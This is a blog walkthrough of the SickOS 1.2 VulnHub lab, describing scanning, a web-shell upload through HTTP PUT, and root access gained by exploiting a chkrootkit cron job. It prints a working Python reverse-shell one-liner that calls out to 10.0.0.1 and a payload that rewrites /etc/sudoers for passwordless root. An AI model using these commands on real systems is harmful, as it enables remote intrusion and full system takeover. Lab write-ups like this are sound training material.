SickOS 1.2 WalkThrough

Kamran Saifullah
5 min readApr 14, 2018

--

Hi,

SickOS 1.2 was fun exploiting. It took much of my time almost at the end when i had to gain the root access. Let’s move;

It can be downloaded from:

https://www.vulnhub.com/entry/sickos-12,144/

As always the first step is the find the IP address.

Once we have got the IP address. The next step is the port scan.

The results shows that 2 ports are open. One is SSH and the second one is HTTP means a website should be running. So let’s check it up in the browser.

Ouch. Nothing serious, just a meme here and nothing juicy in the source code as well. So now i ran Nikto to check for any vulnerabilities and found nothing.

Now what? Something is going on there. Let’s try running dirb to look for hidden directories.

Yes we have found one “/test” directory. Let’s move to the browser again and check what’s in there.

Ohkay! so it’s simply directory listing and nothing else. So far we have found nothing which can lead to the root access of SickOS 1.2. Now What?

Here comes the CURL. Let’s check whether we find any evil methods available.

So here is the first step. PUT method is enabled. Means we can upload files in the directory. B00M! now what?

Let’s try uploading shell which in return will provide us the command line to execute OS commands.

Now back to the browser. Adding ?cmd= to execute our commands and yes it is working.

Now we can make a reverse connection back to our machine via reverse shell. Where to get the shells? Pentest Monkey is there :)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Making the request via browser while keeping the netcat in listening mode. I tried port 445, 4444 and they didn’t worked. It worked on port 443 and all we got is limited shell.

We can upload the PHP Reverse Shell as well. As i have used it in my previous WalkThrough i thought to use the python shell this time. As both are going to work same.

Netcat has got the reverse connection/shell.

After spending some time i found nothing to exploit in order to gain access. After a bit of more looking around I noticed a cron job that runs daily to run chkrootkit. This stood out as something to look into.

After this i quickly googled for any chkrootkit related exploits and found this exploit-db;

It was for the version 0.49 now i had to confirm whether the chkrootkit is of the same version or not before i move onto the exploitation of the vulnerability.

The version seems to be same. On quick quick google search i found that it was vulnerable to Local Root Exploit if we are able to run it on cron task.

What is cron task?

The next process was simple;

# ls -lah /etc/cron* 2>/dev/null | grep chkrootkit

Now all we have to is to wait after we have placed the malicious file in /tmp/update

# echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Once done. Simply run

# sudo su
id
uid=0(root) gid=0(root) groups=0(root)

Now we have gained the root access. Now finding the flag. It’s simple.

# cd /root
# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

That’s it. We have successfully completed SickOS 1.2

I hope you enjoyed the WalkThrough.

Best Regrds,

Kamran Saifullah

--

--

Kamran Saifullah
Kamran Saifullah

Written by Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI

No responses yet